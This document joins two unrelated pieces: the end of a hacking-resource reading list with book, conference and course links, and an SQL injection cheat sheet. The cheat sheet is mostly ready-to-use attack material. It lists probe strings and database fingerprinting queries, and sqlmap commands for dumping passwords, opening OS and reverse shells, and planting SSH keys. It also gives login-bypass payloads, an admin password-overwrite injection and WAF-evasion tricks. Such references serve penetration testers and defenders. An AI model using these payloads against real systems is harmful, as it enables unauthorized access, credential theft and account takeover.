* [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://amzn.to/2iz9K4Y)
* [The Hacker Playbook 2: Practical Guide To Penetration Testing](http://amzn.to/2jMdNbU)
* [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](http://amzn.to/2jMgMkj)
* [Professional Penetration Testing by Thomas Wilhelm, 2013](http://amzn.to/2jMq9AI)
* [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://amzn.to/2jl6GKU)
* [Violent Python by TJ O'Connor, 2012](http://amzn.to/2jMbTYy)
* [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://amzn.to/2izbgDS)
* [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://amzn.to/2jl5FCk)
* [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://amzn.to/2izaBmc)
* [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://amzn.to/2izcwqI)
* [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://amzn.to/2iqoyEj)
* [Bug Hunter's Diary by Tobias Klein, 2011](http://amzn.to/2jkYHO2)
#### Hackers Handbook Series
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://amzn.to/2jlcqEB)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://amzn.to/2iudxwQ)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://amzn.to/2jSUpxO)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://amzn.to/2jl0rGQ)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://amzn.to/2jMpWO4)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://amzn.to/2jmN5tg)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://amzn.to/2jl9asy)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://amzn.to/2jMmtz1)
* [Car Hacker's Handbook by Craig Smith, 2016](http://amzn.to/2jldxnL)
#### Defensive Development
* [Holistic Info-Sec for Web Developers (Fascicle 0)](http://amzn.to/2jmRqwB)
* [Holistic Info-Sec for Web Developers (Fascicle 1)](https://leanpub.com/holistic-infosec-for-web-developers-fascicle1-vps-network-cloud-webapplications)
#### Network Analysis Books
* [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](http://amzn.to/2izkmAN)
* [Practical Packet Analysis by Chris Sanders, 2011](http://amzn.to/2jn091H)
* [Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012](http://amzn.to/2jn4DFU)
* [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](http://amzn.to/2izaCXe)
#### Reverse Engineering Books
* [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/)
* [Hacking the Xbox by Andrew Huang, 2003](http://amzn.to/2iudEbO)
* [The IDA Pro Book by Chris Eagle, 2011](http://amzn.to/2itYfbI)
* [Practical Reverse Engineering by Bruce Dang et al., 2014](http://amzn.to/2jMnAyD)
* [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://amzn.to/2iua6q7)
#### Malware Analysis Books
* [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](http://amzn.to/2izon8f)
* [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](http://amzn.to/2iuh1j8)
* [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](http://amzn.to/2jnag6W)
#### Windows Books
* [Windows Internals by Mark Russinovich et al., 2012](http://amzn.to/2jl4zGJ)
#### Social Engineering Books
* [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://amzn.to/2jMhgXQ)
* [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://amzn.to/2jl287p)
* [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://amzn.to/2izbuuV)
* [No Tech Hacking by Johnny Long & Jack Wiles, 2008](http://amzn.to/2iudb9G)
* [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](http://amzn.to/2iu62WZ)
* [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://amzn.to/2izf4W5)
* [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](http://amzn.to/2izlww9)
#### Lock Picking Books
* [Practical Lock Picking by Deviant Ollam, 2012](http://amzn.to/2jmQeJy)
* [Keys to the Kingdom by Deviant Ollam, 2012](http://amzn.to/2izcvDg)
* [CIA Lock Picking Field Operative Training Manual](http://amzn.to/2jMrw2c)
* [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0)
* [Eddie the Wire books](https://www.dropbox.com/sh/k3z4dm4vyyojp3o/AAAIXQuwMmNuCch_StLPUYm-a?dl=0)
### Vulnerability Databases
* [NVD](https://nvd.nist.gov/) - US National Vulnerability Database
* [CERT](https://www.us-cert.gov/) - US Computer Emergency Readiness Team
* [OSVDB](https://blog.osvdb.org/) - Open Sourced Vulnerability Database
* [Bugtraq](http://www.securityfocus.com/) - Symantec SecurityFocus
* [Exploit-DB](https://www.exploit-db.com/) - Offensive Security Exploit Database
* [Fulldisclosure](http://seclists.org/fulldisclosure/) - Full Disclosure Mailing List
* [MS Bulletin](https://technet.microsoft.com/en-us/security/bulletins) - Microsoft Security Bulletin
* [MS Advisory](https://technet.microsoft.com/en-us/security/advisories) - Microsoft Security Advisories
* [Inj3ct0r](http://www.1337day.com/) - Inj3ct0r Exploit Database
* [Packet Storm](https://packetstormsecurity.com/) - Packet Storm Global Security Resource
* [SecuriTeam](http://www.securiteam.com/) - Securiteam Vulnerability Information
* [CXSecurity](http://cxsecurity.com/) - CSSecurity Bugtraq List
* [Vulnerability Laboratory](http://www.vulnerability-lab.com/) - Vulnerability Research Laboratory
* [ZDI](http://www.zerodayinitiative.com/) - Zero Day Initiative
* [Vulners](https://vulners.com) - Security database of software vulnerabilities
### Security Courses
* [Offensive Security Training](https://www.offensive-security.com/information-security-training/) - Training from BackTrack/Kali developers
* [SANS Security Training](http://www.sans.org/) - Computer Security Training & Certification
* [Open Security Training](http://opensecuritytraining.info/) - Training material for computer security classes
* [CTF Field Guide](https://trailofbits.github.io/ctf/) - everything you need to win your next CTF competition
* [ARIZONA CYBER WARFARE RANGE](http://azcwr.org/) - 24x7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.
* [Cybrary](http://cybrary.it) - Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book 'Penetration Testing for Highly Secured Enviroments'.
* [Computer Security Student](http://computersecuritystudent.com) - Many free tutorials, great for beginners, $10/mo membership unlocks all content
* [European Union Agency for Network and Information Security](https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material) - ENISA Cyber Security Training material
### Information Security Conferences
* [DEF CON](https://www.defcon.org/) - An annual hacker convention in Las Vegas
* [Black Hat](http://www.blackhat.com/) - An annual security conference in Las Vegas
* [BSides](http://www.securitybsides.com/) - A framework for organising and holding security conferences
* [CCC](https://events.ccc.de/congress/) - An annual meeting of the international hacker scene in Germany
* [DerbyCon](https://www.derbycon.com/) - An annual hacker conference based in Louisville
* [PhreakNIC](http://phreaknic.info/) - A technology conference held annually in middle Tennessee
* [ShmooCon](http://shmoocon.org/) - An annual US east coast hacker convention
* [CarolinaCon](http://www.carolinacon.org/) - An infosec conference, held annually in North Carolina
* [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con
* [SummerCon](http://www.summercon.org/) - One of the oldest hacker conventions, held during Summer
* [Hack.lu](https://2016.hack.lu/) - An annual conference held in Luxembourg
* [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands
* [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany
* [Hack3rCon](http://hack3rcon.org/) - An annual US hacker conference
* [ThotCon](http://thotcon.org/) - An annual US hacker conference held in Chicago
* [LayerOne](http://www.layerone.org/) - An annual US security conference held every spring in Los Angeles
* [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria
* [SkyDogCon](http://www.skydogcon.com/) - A technology conference in Nashville
* [SECUINSIDE](http://secuinside.com) - Security Conference in [Seoul](https://en.wikipedia.org/wiki/Seoul)
* [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania
* [AppSecUSA](https://appsecusa.org/) - An annual conference organised by OWASP
* [BruCON](http://brucon.org) - An annual security conference in Belgium
* [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK
* [Nullcon](http://nullcon.net/website/) - An annual conference in Delhi and Goa, India
* [RSA Conference USA](https://www.rsaconference.com/) - An annual security conference in San Francisco, California, USA
* [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - An annual security conference in Lucerne, Switzerland
* [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - An annual conference going to be held in Denver, USA for 2016
* [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina
* [44Con](https://44con.com/) - Annual Security Conference held in London
* [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annualy held in Novi Sad, Serbia
* [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia
### Information Security Magazines
* [2600: The Hacker Quarterly](https://www.2600.com/Magazine/DigitalEditions) - An American publication about technology and computer "underground"
* [Phrack Magazine](http://www.phrack.org/) - By far the longest running hacker zine
Please have a look at
* [Top Hacking Books](http://www.kalitut.com/2016/12/best-ethical-hacking-books.html)
* [Top Reverse Engineering Books](http://www.kalitut.com/2017/01/Best-reverse-engineering-books.html)
* [Top Machine learning Books](http://www.kalitut.com/2017/01/machine-learning-book.html)
* [Top 5 books Programming Books](http://www.kalitut.com/2017/01/Top-Programming-Books.html)
* [Top Java Books](http://www.kalitut.com/2017/01/Best-Java-Programming-Books.html)
|
# SQL injection
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
- Bypassing authorisation controls
## Summary
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
* [Using TOR with SQLmap](#using-tor-with-sqlmap)
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [Authentication bypass](#authentication-bypass)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Routed injection](#routed-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
Detection of an SQL injection entry point
Simple characters
```sql
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
```
Multiple encoding
```sql
%%2727
%25%27
```
Merging characters
```sql
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
Weird characters
```sql
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
```
## DBMS Identification
```c
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
## SQL injection using SQLmap
### Basic arguments for SQLmap
```powershell
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```
### Load a request file and use mobile user-agent
```powershell
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
```
### Custom injection in UserAgent/Header/Referer/Cookie
```powershell
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
The injection is located at the '*'
```
### Second order injection
```powershell
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
### Shell
```powershell
SQL Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
```
### Crawl a website with SQLmap and auto-exploit
```powershell
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
### Using TOR with SQLmap
```powershell
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
```
### Using a proxy with SQLmap
```powershell
sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
```
### Using Chrome cookie and a Proxy
```powershell
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
```
### Using suffix to tamper the injection
```powershell
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
tamper=name_of_the_tamper
```
| Tamper | Description |
| --- | --- |
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|base64encode.py | Base64 all characters in a given payload |
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() |
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' |
|escapequotes.py | Slash escape quotes (' and ") |
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') |
|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart|
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart |
|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
|modsecurityversioned.py | Embraces complete query with versioned comment |
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
|percentage.py | Adds a percentage sign ('%') infront of each character |
|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart |
|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
|randomcase.py | Replaces each keyword character with random case value |
|randomcomments.py | Add random comments to SQL keywords|
|securesphere.py | Appends special crafted string |
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|space2comment.py | Replaces space character (' ') with comments |
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|varnish.py | Append a HTTP header 'X-originating-IP' |
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
## Authentication bypass
```sql
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6�]��!r,��b
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Routed injection
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
```sql
Inject using payload:
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
## WAF Bypass
No Space (%20) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
No Whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
No Comma - bypass using OFFSET, FROM and JOIN
```sql
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
```sql
?id=1 and substring(version(),1,1)like(5)
?id=1 and substring(version(),1,1)not in(4,3)
?id=1 and substring(version(),1,1)in(4,3)
?id=1 and substring(version(),1,1) between 3 and 4
```
Blacklist using keywords - bypass using uppercase/lowercase
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
Blacklist using keywords case insensitive - bypass using an equivalent operator
```sql
AND -> &&
OR -> ||
= -> LIKE,REGEXP, BETWEEN, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
```
Information_schema.tables Alternative
```sql
select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
| dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 |
| dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 |
...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
mysql> show tables in dvwa;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
```
Version Alternative
```sql
mysql> select @@innodb_version;
+------------------+
| @@innodb_version |
+------------------+
| 5.6.31 |
+------------------+
mysql> select @@version;
+-------------------------+
| @@version |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
mysql> mysql> select version();
+-------------------------+
| version() |
+-------------------------+
| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
```
## References
* Detect SQLi
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL:
* [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
* [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
* MSSQL:
* [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php)
* [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
* [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
* [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
* [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
* [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
* [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
* [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/)
* [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
